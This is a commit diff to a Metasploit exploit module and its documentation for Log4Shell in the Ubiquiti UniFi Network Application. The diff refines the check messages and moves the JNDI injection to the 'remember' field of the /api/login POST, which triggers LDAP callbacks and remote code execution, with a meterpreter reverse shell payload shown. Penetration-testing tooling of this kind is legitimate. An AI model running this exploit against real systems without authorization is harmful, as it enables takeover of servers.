Add details to check codes and PR feedback

documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md

@@ -2,8 +2,9 @@
 
 ### Description
 The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
-vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
-deserialize a malicious Java object. This results in OS command execution.
+vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the
+/api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java
+object. This results in OS command execution in the context of the server application.
 
 This module will start an LDAP server that the target will need to connect to.
 
@@ -33,7 +34,6 @@ Older versions of the UniFi Network Application can be downloaded from [communit
 This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.54, v6.0.45, and v5.14.23 all contain the fix for this
 vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.
 
-
 ```
 msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell 
 [*] Using configured payload windows/meterpreter/reverse_tcp

modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb

@@ -14,8 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
       'Description' => %q{
         The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
-        vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
-        deserialize a malicious Java object. This results in OS command execution.
+        vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the
+        /api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java
+        object. This results in OS command execution in the context of the server application.
 
         This module will start an LDAP server that the target will need to connect to.
       },
@@ -77,10 +78,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     validate_configuration!
     res = send_request_cgi('uri' => normalize_uri(target_uri, 'status'))
-    return Exploit::CheckCode::Unknown if res.nil?
+    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
 
     server_version = res.get_json_document.dig('meta', 'server_version')
-    return Exploit::CheckCode::Safe unless server_version =~ /(\d+\.)+/
+    return Exploit::CheckCode::Safe('The target service does not appear to be running.') unless server_version =~ /(\d+\.)+/
 
     vprint_status("Detected version: #{server_version}")
     server_version = Rex::Version.new(server_version)
@@ -93,12 +94,11 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')
 
     start_service
-    trigger
+    res = trigger
+    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
 
     wait_until { @search_received }
-    return Exploit::CheckCode::Unknown unless @search_received
-
-    Exploit::CheckCode::Vulnerable
+    @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
   ensure
     stop_service
   end
@@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'ctype' => 'application/json',
       'data' => {
-        'username' => jndi_string,
+        'username' => rand_text_alphanumeric(8..16), # can not be blank!,
         'password' => rand_text_alphanumeric(8..16), # can not be blank!
         'remember' => jndi_string,
         'strict' => true